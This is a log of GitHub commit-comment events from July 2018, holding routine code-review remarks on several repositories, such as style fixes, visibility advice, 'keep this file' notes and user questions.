{"id":"7905360803","type":"CommitCommentEvent","actor":{"login":"JustDoItOrSayBB"},"repo":{"name":"JustDoItOrSayBB/cc2"},"payload":{"comment":{"id":29563189,"position":6,"line":11,"path":"src/main/java/com/eazytec/cc/App.java","commit_id":"c210afd69da3a262486515da96641a969b66253f","created_at":"2018-07-02T09:00:24Z","updated_at":"2018-07-02T09:00:24Z","author_association":"OWNER","body":"怎么是乱码1!"}},"created_at":"2018-07-02T09:00:24Z"}
{"id":"7905362156","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563194,"position":1,"line":22,"path":"agent/webapps/server/src/main/java/com/axway/ats/agent/webapp/restservice/BaseRestServiceImpl.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:00:38Z","updated_at":"2018-07-02T09:00:38Z","author_association":"OWNER","body":"This whole file must be checked"}},"created_at":"2018-07-02T09:00:38Z"}
{"id":"7905362496","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563195,"position":1,"line":61,"path":"agent/webapps/server/src/main/java/com/axway/ats/agent/webapp/restservice/MonitoringServiceImpl.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:00:42Z","updated_at":"2018-07-02T09:00:42Z","author_association":"OWNER","body":"This whole file must be checked"}},"created_at":"2018-07-02T09:00:42Z"}
{"id":"7905362515","type":"CommitCommentEvent","actor":{"login":"markkovari"},"repo":{"name":"green-fox-academy/MrBB7"},"payload":{"comment":{"id":29563196,"position":11,"line":11,"path":"week -2(Orientation)/day4/FoxClub/FoxClub/Services/FoxServices.cs","commit_id":"c9448fbd17e77e8084950df04bea7b5f6c1dfb2d","created_at":"2018-07-02T09:00:42Z","updated_at":"2018-07-02T09:00:42Z","author_association":"NONE","body":"If you have public methods you can make this field private as well"}},"created_at":"2018-07-02T09:00:42Z"}
{"id":"7905367071","type":"CommitCommentEvent","actor":{"login":"alekseisasin"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":29563199,"position":null,"line":null,"path":null,"commit_id":"b56d33b9f32e5e819a2104a84a89820345613e91","created_at":"2018-07-02T09:01:31Z","updated_at":"2018-07-02T09:01:31Z","author_association":"CONTRIBUTOR","body":"Hi @smartavionics , the initial issue is from here https://github.com/Ultimaker/Cura/issues/3296\r\nI added comments for the new code. I did not touch for the main sorting part from line 70 to109, because this also was not so clear:\r\n coord_t best_detour_dist = vSize(items[*best_item_to_insert_before].first - to_insert_item_location)\r\n+ vSize(to_insert_item_location - items[order.back()].first)\r\n- vSize(items[*best_item_to_insert_before].first - items[order.back()].first);"}},"created_at":"2018-07-02T09:01:31Z"}
{"id":"7905367346","type":"CommitCommentEvent","actor":{"login":"Alex-Sokolov"},"repo":{"name":"selkinvitaly/vue_3"},"payload":{"comment":{"id":29563200,"position":9,"line":9,"path":"src/utils/auth.ts","commit_id":"c87d759958f1f5865efa2c39af7a661ba71e79b7","created_at":"2018-07-02T09:01:35Z","updated_at":"2018-07-02T09:01:35Z","author_association":"NONE","body":"localStorage в принципе ок, хотя некоторые не советуют его использовать (https://www.rdegges.com/2018/please-stop-using-local-storage/). Ну и помните, что например в инкогнито в сафари он может отсутствовать вообще"}},"created_at":"2018-07-02T09:01:35Z"}
{"id":"7905370657","type":"CommitCommentEvent","actor":{"login":"earnway"},"repo":{"name":"cucygh/interview"},"payload":{"comment":{"id":29563207,"position":null,"line":null,"path":null,"commit_id":"b77a8dce3cd86df82a790110904f2a4511202573","created_at":"2018-07-02T09:02:14Z","updated_at":"2018-07-02T09:02:14Z","author_association":"NONE","body":"怎么下载啊"}},"created_at":"2018-07-02T09:02:14Z"}
{"id":"7905373027","type":"CommitCommentEvent","actor":{"login":"markkovari"},"repo":{"name":"green-fox-academy/MrBB7"},"payload":{"comment":{"id":29563215,"position":null,"line":null,"path":null,"commit_id":"c9448fbd17e77e8084950df04bea7b5f6c1dfb2d","created_at":"2018-07-02T09:02:41Z","updated_at":"2018-07-02T09:02:41Z","author_association":"NONE","body":"Good to see, you understood the main concept of controllers and services. \r\nWe will expand the layers later and I think you already got it how we can and should separate the different layers."}},"created_at":"2018-07-02T09:02:41Z"}
{"id":"7905373422","type":"CommitCommentEvent","actor":{"login":"kalyankondapally"},"repo":{"name":"intel/external-mesa"},"payload":{"comment":{"id":29563219,"position":5,"line":67,"path":"src/intel/vulkan/anv_intel.c","commit_id":"843315fd4f0f942ed252f2183b9806d1e31e0fc3","created_at":"2018-07-02T09:02:45Z","updated_at":"2018-07-02T09:02:45Z","author_association":"CONTRIBUTOR","body":"@strassek Do we still need to carry this patch ?"}},"created_at":"2018-07-02T09:02:45Z"}
{"id":"7905376062","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/TatianaPovalyaeva"},"payload":{"comment":{"id":29563227,"position":1,"line":1,"path":"Week-07/day-01/workshop/Tests/test-doubling.js","commit_id":"8cdad33288921dc98451af72d1e8d112c7672244","created_at":"2018-07-02T09:03:17Z","updated_at":"2018-07-02T09:03:17Z","author_association":"NONE","body":"missing semicolon"}},"created_at":"2018-07-02T09:03:17Z"}
{"id":"7905376268","type":"CommitCommentEvent","actor":{"login":"Alex-Sokolov"},"repo":{"name":"selkinvitaly/vue_3"},"payload":{"comment":{"id":29563228,"position":27,"line":27,"path":"src/views/UserList.vue","commit_id":"c87d759958f1f5865efa2c39af7a661ba71e79b7","created_at":"2018-07-02T09:03:20Z","updated_at":"2018-07-02T09:03:20Z","author_association":"NONE","body":"Все-таки просто объект user передавать в компонент удобнее. Меньше потребуется менять при изменении структуры"}},"created_at":"2018-07-02T09:03:20Z"}
{"id":"7905377213","type":"CommitCommentEvent","actor":{"login":"SofiaSousa"},"repo":{"name":"WordPress/gutenberg"},"payload":{"comment":{"id":29563231,"position":null,"line":null,"path":null,"commit_id":"e197ba045793158cec8ec47b88a438dfc417144a","created_at":"2018-07-02T09:03:31Z","updated_at":"2018-07-02T09:03:31Z","author_association":"CONTRIBUTOR","body":"![image](https://user-images.githubusercontent.com/15556410/42155011-21bcc04c-7ddf-11e8-9918-a2ad0767cf73.png)\r\n"}},"created_at":"2018-07-02T09:03:31Z"}
{"id":"7905380192","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/TatianaPovalyaeva"},"payload":{"comment":{"id":29563243,"position":11,"line":11,"path":"Week-07/day-01/workshop/Tests/test-doubling.js","commit_id":"8cdad33288921dc98451af72d1e8d112c7672244","created_at":"2018-07-02T09:04:09Z","updated_at":"2018-07-02T09:04:09Z","author_association":"NONE","body":"missing space after the last single quote\r\n`{ error: 'Please provide and input!' })`"}},"created_at":"2018-07-02T09:04:09Z"}
{"id":"7905380397","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29563245,"position":null,"line":null,"path":null,"commit_id":"cf9716d65c4d243cd375cd77b77b7bc85053ae63","created_at":"2018-07-02T09:04:11Z","updated_at":"2018-07-02T09:04:11Z","author_association":"COLLABORATOR","body":"Puzzle `980-46a74068` discovered in   [`src/main/java/com/zerocracy/pmo/banks/Crypto.java`](  https://github.com/zerocracy/farm/blob/master/src/main/java/com/zerocracy/pmo/banks/Crypto.java)   and submitted as #1304. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-02T09:04:11Z"}
{"id":"7905381763","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/TatianaPovalyaeva"},"payload":{"comment":{"id":29563252,"position":22,"line":22,"path":"Week-07/day-01/workshop/Tests/test-doubling.js","commit_id":"8cdad33288921dc98451af72d1e8d112c7672244","created_at":"2018-07-02T09:04:26Z","updated_at":"2018-07-02T09:04:26Z","author_association":"NONE","body":"here too "}},"created_at":"2018-07-02T09:04:26Z"}
{"id":"7905382385","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/TatianaPovalyaeva"},"payload":{"comment":{"id":29563254,"position":1,"line":1,"path":"Week-07/day-01/workshop/Tests/test-greeter.js","commit_id":"8cdad33288921dc98451af72d1e8d112c7672244","created_at":"2018-07-02T09:04:33Z","updated_at":"2018-07-02T09:04:33Z","author_association":"NONE","body":"missing semicolon"}},"created_at":"2018-07-02T09:04:33Z"}
{"id":"7905383598","type":"CommitCommentEvent","actor":{"login":"markkovari"},"repo":{"name":"green-fox-academy/MrBB7"},"payload":{"comment":{"id":29563259,"position":5,"line":28,"path":"week -2(Orientation)/day1/RestWorld/RestWorld/Models/EveryHello.cs","commit_id":"8427e2c33ed1aa8a73a71754b0f26fdbbe35b707","created_at":"2018-07-02T09:04:48Z","updated_at":"2018-07-02T09:04:48Z","author_association":"NONE","body":"This method name can be a bit misleading, because it is not a font, it is the size of the font I guess."}},"created_at":"2018-07-02T09:04:48Z"}
{"id":"7905391466","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/TatianaPovalyaeva"},"payload":{"comment":{"id":29563282,"position":5,"line":11,"path":"Week-07/day-01/workshop/Tests/test-doubling.js","commit_id":"84cca4a26025c3ce463acafc8dc95bd2d0a0e4d8","created_at":"2018-07-02T09:06:12Z","updated_at":"2018-07-02T09:06:12Z","author_association":"NONE","body":"sorry for my previous comments, i see you fixed most of them :) "}},"created_at":"2018-07-02T09:06:12Z"}
{"id":"7905391842","type":"CommitCommentEvent","actor":{"login":"ANILILU"},"repo":{"name":"ANILILU/hello-world"},"payload":{"comment":{"id":29563283,"position":null,"line":null,"path":null,"commit_id":"ff349167697936ffbf89c98992fe56c0fb89fc1a","created_at":"2018-07-02T09:06:16Z","updated_at":"2018-07-02T09:06:16Z","author_association":"OWNER","body":"This is a simple thing that can help you free but you can get experience by receiving experience."}},"created_at":"2018-07-02T09:06:16Z"}
{"id":"7905393006","type":"CommitCommentEvent","actor":{"login":"Brybry16"},"repo":{"name":"Brybry16/ChannelLinkerBot"},"payload":{"comment":{"id":29563289,"position":null,"line":null,"path":null,"commit_id":"3b91ad1a182fdaab4b7e8ce831dbcc7fb567c911","created_at":"2018-07-02T09:06:30Z","updated_at":"2018-07-02T09:06:30Z","author_association":"OWNER","body":"@henrymiles123 Hey, sorry that many days after your comment.\r\n\r\nI'm not the one who created that bot, and I originally wanted to improve it but the bot being coded in C# was too restrictive for me, so I can't really help you with your problem. If you're interested, I recoded the bot from scratch in NodeJS. You can find the sources and a readme (in french, I'll maybe create an english version later) in this repository : https://github.com/Brybry16/Discord-ChannelLinkerBotJS"}},"created_at":"2018-07-02T09:06:30Z"}
{"id":"7905393129","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563290,"position":1,"line":50,"path":"commonlibrary/src/main/java/com/axway/ats/common/dbaccess/snapshot/DatabaseSnapshotUtils.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:06:32Z","updated_at":"2018-07-02T09:06:32Z","author_association":"OWNER","body":"keep this file"}},"created_at":"2018-07-02T09:06:32Z"}
{"id":"7905393518","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563291,"position":1,"line":360,"path":"commonlibrary/src/main/java/com/axway/ats/common/dbaccess/snapshot/TableDescription.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:06:37Z","updated_at":"2018-07-02T09:06:37Z","author_association":"OWNER","body":"keep this file"}},"created_at":"2018-07-02T09:06:37Z"}
{"id":"7905394176","type":"CommitCommentEvent","actor":{"login":"ANILILU"},"repo":{"name":"ANILILU/hello-world"},"payload":{"comment":{"id":29563293,"position":2,"line":2,"path":"README.md","commit_id":"ff349167697936ffbf89c98992fe56c0fb89fc1a","created_at":"2018-07-02T09:06:44Z","updated_at":"2018-07-02T09:06:44Z","author_association":"OWNER","body":"This is a simple thing that can help you free but you can get experience by receiving experience."}},"created_at":"2018-07-02T09:06:44Z"}
{"id":"7905394332","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563296,"position":1,"line":361,"path":"commonlibrary/src/main/java/com/axway/ats/common/dbaccess/snapshot/equality/DatabaseEqualityState.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:06:46Z","updated_at":"2018-07-02T09:06:46Z","author_association":"OWNER","body":"keep this file"}},"created_at":"2018-07-02T09:06:46Z"}
{"id":"7905395318","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563299,"position":1,"line":19,"path":"commonlibrary/src/main/java/com/axway/ats/common/filesystem/snapshot/equality/FileSystemEqualityState.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:06:58Z","updated_at":"2018-07-02T09:06:58Z","author_association":"OWNER","body":"keep this file"}},"created_at":"2018-07-02T09:06:58Z"}
{"id":"7905401432","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/TatianaPovalyaeva"},"payload":{"comment":{"id":29563312,"position":15,"line":15,"path":"Week-07/day-01/workshop/server.js","commit_id":"8cdad33288921dc98451af72d1e8d112c7672244","created_at":"2018-07-02T09:08:14Z","updated_at":"2018-07-02T09:08:14Z","author_association":"NONE","body":"`if(req.query.input) {` is enough, you don't need the not equal to undefined part "}},"created_at":"2018-07-02T09:08:14Z"}
{"id":"7905401517","type":"CommitCommentEvent","actor":{"login":"remmel"},"repo":{"name":"symfony/symfony"},"payload":{"comment":{"id":29563313,"position":null,"line":null,"path":null,"commit_id":"89ed756462fd4660acfd8ad1c2224dffa0fccf3e","created_at":"2018-07-02T09:08:15Z","updated_at":"2018-07-02T09:08:15Z","author_association":"NONE","body":"The current commit has the test which is testing the fix of the bug I found. I don't know where is the faulty code and where it has been fixed. But the important point is that, that bug has been fixed."}},"created_at":"2018-07-02T09:08:15Z"}
{"id":"7905401706","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563314,"position":1,"line":23,"path":"corelibrary/src/main/java/com/axway/ats/core/atsconfig/AtsInfrastructureManager.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:08:17Z","updated_at":"2018-07-02T09:08:17Z","author_association":"OWNER","body":"keep this file"}},"created_at":"2018-07-02T09:08:17Z"}
{"id":"7905402181","type":"CommitCommentEvent","actor":{"login":"userwithoutlogin"},"repo":{"name":"userwithoutlogin/SpringTestWebApp"},"payload":{"comment":{"id":29563317,"position":null,"line":null,"path":null,"commit_id":"9c1e42f4a9c7ed194485b63f69b4485ab5d97ed4","created_at":"2018-07-02T09:08:23Z","updated_at":"2018-07-02T09:08:23Z","author_association":"OWNER","body":"ADD EDIT PAGE"}},"created_at":"2018-07-02T09:08:23Z"}
{"id":"7905403985","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563321,"position":1,"line":15,"path":"corelibrary/src/main/java/com/axway/ats/core/atsconfig/model/AbstractApplicationController.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:08:45Z","updated_at":"2018-07-02T09:08:45Z","author_association":"OWNER","body":"keep this file"}},"created_at":"2018-07-02T09:08:45Z"}
{"id":"7905404635","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563323,"position":2,"line":16,"path":"corelibrary/src/main/java/com/axway/ats/core/atsconfig/model/AgentController.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:08:52Z","updated_at":"2018-07-02T09:08:52Z","author_association":"OWNER","body":"keep this file"}},"created_at":"2018-07-02T09:08:52Z"}
{"id":"7905407489","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563331,"position":1,"line":18,"path":"corelibrary/src/main/java/com/axway/ats/core/atsconfig/model/ApplicationController.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:09:29Z","updated_at":"2018-07-02T09:09:29Z","author_association":"OWNER","body":"keep this file"}},"created_at":"2018-07-02T09:09:29Z"}
{"id":"7905409625","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563337,"position":1,"line":42,"path":"corelibrary/src/main/java/com/axway/ats/core/dbaccess/DatabaseProviderFactory.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:09:55Z","updated_at":"2018-07-02T09:09:55Z","author_association":"OWNER","body":"keep this file"}},"created_at":"2018-07-02T09:09:55Z"}
{"id":"7905410490","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563340,"position":1,"line":56,"path":"corelibrary/src/main/java/com/axway/ats/core/dbaccess/DbConnection.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:10:05Z","updated_at":"2018-07-02T09:10:05Z","author_association":"OWNER","body":"keep this file"}},"created_at":"2018-07-02T09:10:05Z"}
{"id":"7905411516","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563352,"position":1,"line":95,"path":"corelibrary/src/main/java/com/axway/ats/core/dbaccess/DbRecordValuesList.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:10:17Z","updated_at":"2018-07-02T09:10:17Z","author_association":"OWNER","body":"keep this file"}},"created_at":"2018-07-02T09:10:17Z"}
{"id":"7905412871","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563359,"position":1,"line":129,"path":"corelibrary/src/main/java/com/axway/ats/core/dbaccess/DbUtils.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:10:33Z","updated_at":"2018-07-02T09:10:33Z","author_association":"OWNER","body":"keep this file"}},"created_at":"2018-07-02T09:10:33Z"}
{"id":"7905413500","type":"CommitCommentEvent","actor":{"login":"jalvz"},"repo":{"name":"elastic/apm-server"},"payload":{"comment":{"id":29563361,"position":null,"line":null,"path":null,"commit_id":"f25c0246cfe66fc202de1420a360a7a52f5dbc92","created_at":"2018-07-02T09:10:40Z","updated_at":"2018-07-02T09:10:40Z","author_association":"COLLABORATOR","body":"Ill just copy this for master :)"}},"created_at":"2018-07-02T09:10:40Z"}
{"id":"7905414383","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563364,"position":1,"line":20,"path":"corelibrary/src/main/java/com/axway/ats/core/dbaccess/cassandra/DbConnCassandra.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:10:52Z","updated_at":"2018-07-02T09:10:52Z","author_association":"OWNER","body":"keep this file"}},"created_at":"2018-07-02T09:10:52Z"}
{"id":"7905416505","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563372,"position":1,"line":72,"path":"corelibrary/src/main/java/com/axway/ats/core/dbaccess/mssql/DbConnSQLServer.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:11:17Z","updated_at":"2018-07-02T09:11:17Z","author_association":"OWNER","body":"keep this file"}},"created_at":"2018-07-02T09:11:17Z"}
{"id":"7905419347","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563381,"position":1,"line":195,"path":"corelibrary/src/main/java/com/axway/ats/core/dbaccess/mssql/MssqlDbProvider.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:11:52Z","updated_at":"2018-07-02T09:11:52Z","author_association":"OWNER","body":"keep this file"}},"created_at":"2018-07-02T09:11:52Z"}
{"id":"7905420288","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563382,"position":1,"line":20,"path":"corelibrary/src/main/java/com/axway/ats/core/dbaccess/mysql/DbConnMySQL.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:12:04Z","updated_at":"2018-07-02T09:12:04Z","author_association":"OWNER","body":"keep this file"}},"created_at":"2018-07-02T09:12:04Z"}
{"id":"7905420858","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563384,"position":1,"line":123,"path":"corelibrary/src/main/java/com/axway/ats/core/dbaccess/mysql/MysqlDbProvider.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:12:11Z","updated_at":"2018-07-02T09:12:11Z","author_association":"OWNER","body":"keep this file"}},"created_at":"2018-07-02T09:12:11Z"}
{"id":"7905421793","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563387,"position":1,"line":114,"path":"corelibrary/src/main/java/com/axway/ats/core/dbaccess/oracle/DbConnOracle.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:12:22Z","updated_at":"2018-07-02T09:12:22Z","author_association":"OWNER","body":"keep this file"}},"created_at":"2018-07-02T09:12:22Z"}
{"id":"7905422519","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563392,"position":1,"line":36,"path":"corelibrary/src/main/java/com/axway/ats/core/dbaccess/oracle/OracleDbProvider.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:12:31Z","updated_at":"2018-07-02T09:12:31Z","author_association":"OWNER","body":"keep this file"}},"created_at":"2018-07-02T09:12:31Z"}
{"id":"7905423201","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563396,"position":1,"line":32,"path":"corelibrary/src/main/java/com/axway/ats/core/dbaccess/postgresql/DbConnPostgreSQL.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:12:38Z","updated_at":"2018-07-02T09:12:38Z","author_association":"OWNER","body":"keep this file"}},"created_at":"2018-07-02T09:12:38Z"}
{"id":"7905423488","type":"CommitCommentEvent","actor":{"login":"dimaShin"},"repo":{"name":"dimaShin/course-ng-webpack"},"payload":{"comment":{"id":29563398,"position":5,"line":8,"path":"src/routes/my-route.controller.js","commit_id":"c4f3d328c03a208e1190c584a4f0b1551cc1edc6","created_at":"2018-07-02T09:12:41Z","updated_at":"2018-07-02T09:12:41Z","author_association":"OWNER","body":"Когда одна переменная всегда противоположного значения (никогда не будет одновременно и того и другого) лучше использовать только одну и комбинировать директивы ng-show/ng-hide"}},"created_at":"2018-07-02T09:12:41Z"}
{"id":"7905423793","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563399,"position":1,"line":1,"path":"corelibrary/src/main/java/com/axway/ats/core/dbaccess/postgresql/PostgreSqlProvider.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:12:45Z","updated_at":"2018-07-02T09:12:45Z","author_association":"OWNER","body":"keep this file"}},"created_at":"2018-07-02T09:12:45Z"}
{"id":"7905425663","type":"CommitCommentEvent","actor":{"login":"jakdrizzt"},"repo":{"name":"GTMoogle/StreamTheater"},"payload":{"comment":{"id":29563404,"position":null,"line":null,"path":null,"commit_id":"fbc4519a5d171459dd71b72aeba92fda6cb185a1","created_at":"2018-07-02T09:13:06Z","updated_at":"2018-07-02T09:13:06Z","author_association":"NONE","body":"Wow wow penkamaster does it mean that with your version there's no more the issue with the latest GFE drivers?\r\nAnd, maybe, is it even possibile, as in Moonlight, to disable GFE game settings auto optimizing? \r\n(it's a shame: for me stream theater works far better than any other app that streams to the gear vr but every time i try to play a game GFE sets every graphic option to low and then i have to manually reset everything to my preference... And with some settings i just can't because they need a game restart and, of course, if i restart, GFE would again set it to low).\r\n\r\nHave GTMoogle ever answered you?\r\nIf not is anyway possible to get your version?\r\n\r\nExcuse my wave of questions but i'd really love to see this project continue and your post of only one month ago gave me hope :) "}},"created_at":"2018-07-02T09:13:06Z"}
{"id":"7905429547","type":"CommitCommentEvent","actor":{"login":"dimaShin"},"repo":{"name":"dimaShin/course-ng-webpack"},"payload":{"comment":{"id":29563411,"position":4,"line":2,"path":"src/routes/my-route.html","commit_id":"c4f3d328c03a208e1190c584a4f0b1551cc1edc6","created_at":"2018-07-02T09:13:47Z","updated_at":"2018-07-02T09:13:47Z","author_association":"OWNER","body":"ng-hide=\"showForm\""}},"created_at":"2018-07-02T09:13:47Z"}
{"id":"7905447192","type":"CommitCommentEvent","actor":{"login":"jakubschwan"},"repo":{"name":"jboss-container-images/rhpam-7-openshift-image"},"payload":{"comment":{"id":29563436,"position":43,"line":733,"path":"templates/rhpam70-authoring-ha.yaml","commit_id":"99494dacb7f712c7606354b6c90aa9b81c4874d5","created_at":"2018-07-02T09:16:54Z","updated_at":"2018-07-02T09:16:54Z","author_association":"CONTRIBUTOR","body":"@spolti These variables are required for SSO client configuration"}},"created_at":"2018-07-02T09:16:54Z"}
{"id":"7905448150","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/krisztiankassai"},"payload":{"comment":{"id":29563438,"position":5,"line":5,"path":"week-06/day4/src/Todo.java","commit_id":"7578b4dffc390c7073325c4bcc5d7f4ac2fdf706","created_at":"2018-07-02T09:17:05Z","updated_at":"2018-07-02T09:17:05Z","author_association":"NONE","body":"Unfortunately you forgot the visibility keywords, the field reachable without getter/setter."}},"created_at":"2018-07-02T09:17:05Z"}
{"id":"7905449095","type":"CommitCommentEvent","actor":{"login":"LtKst"},"repo":{"name":"LtKst/pictures"},"payload":{"comment":{"id":29563441,"position":null,"line":null,"path":null,"commit_id":"cb1d09ddb9c4eb6661e72481897a4c806fb37234","created_at":"2018-07-02T09:17:16Z","updated_at":"2018-07-02T09:17:16Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Always on top mode](https://trello.com/c/bsAk6rBU/12-always-on-top-mode)"}},"created_at":"2018-07-02T09:17:16Z"}
{"id":"7905450648","type":"CommitCommentEvent","actor":{"login":"jakubschwan"},"repo":{"name":"jboss-container-images/rhpam-7-openshift-image"},"payload":{"comment":{"id":29563445,"position":74,"line":912,"path":"templates/rhpam70-authoring-ha.yaml","commit_id":"99494dacb7f712c7606354b6c90aa9b81c4874d5","created_at":"2018-07-02T09:17:33Z","updated_at":"2018-07-02T09:17:33Z","author_association":"CONTRIBUTOR","body":"@spolti These variables are required for SSO client configuration"}},"created_at":"2018-07-02T09:17:33Z"}
{"id":"7905454399","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563453,"position":245,"line":2817,"path":"corelibrary/src/main/java/com/axway/ats/core/filesystem/LocalFileSystemOperations.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:18:17Z","updated_at":"2018-07-02T09:18:17Z","author_association":"OWNER","body":"Delete the commented lines below"}},"created_at":"2018-07-02T09:18:17Z"}
{"id":"7905458440","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/krisztiankassai"},"payload":{"comment":{"id":29563464,"position":56,"line":50,"path":"week-06/day4/src/Todo.java","commit_id":"7578b4dffc390c7073325c4bcc5d7f4ac2fdf706","created_at":"2018-07-02T09:19:05Z","updated_at":"2018-07-02T09:19:05Z","author_association":"NONE","body":"PLease put the constructors immediately after the fields, the getters and setters unimportant but these functions that come across at first"}},"created_at":"2018-07-02T09:19:05Z"}
{"id":"7905461478","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563473,"position":1,"line":483,"path":"utilities/s3-utilities/src/main/java/com/axway/ats/action/s3/S3Operations.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:19:39Z","updated_at":"2018-07-02T09:19:39Z","author_association":"OWNER","body":"keep this file"}},"created_at":"2018-07-02T09:19:39Z"}
